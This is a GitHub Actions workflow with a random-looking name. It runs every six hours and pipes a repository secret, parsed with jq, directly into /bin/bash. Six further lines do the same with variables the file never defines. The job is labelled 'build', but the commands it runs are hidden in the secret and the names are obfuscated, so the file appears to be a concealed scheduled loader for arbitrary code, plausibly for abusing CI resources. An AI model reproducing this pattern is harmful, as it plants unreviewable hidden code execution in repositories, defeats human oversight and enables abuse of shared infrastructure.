name: huaizhongjiechu
on:
  workflow_dispatch:
  schedule:
    - cron: '45 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: huaizhongjiechu
        env:
          ia62: ${{ secrets.ia62 }}
        run: |
          echo $ia62 | jq -r .mwo6775 | /bin/bash
          echo $tuqg602 | jq -r .gtuub01 | /bin/bash
          echo $qcu47645 | jq -r .oooc1429 | /bin/bash
          echo $iudu6792 | jq -r .rs487 | /bin/bash
          echo $pcgj96 | jq -r .sfwl650 | /bin/bash
          echo $ddf08185 | jq -r .o74 | /bin/bash
          echo $s8913 | jq -r .ew5597 | /bin/bash

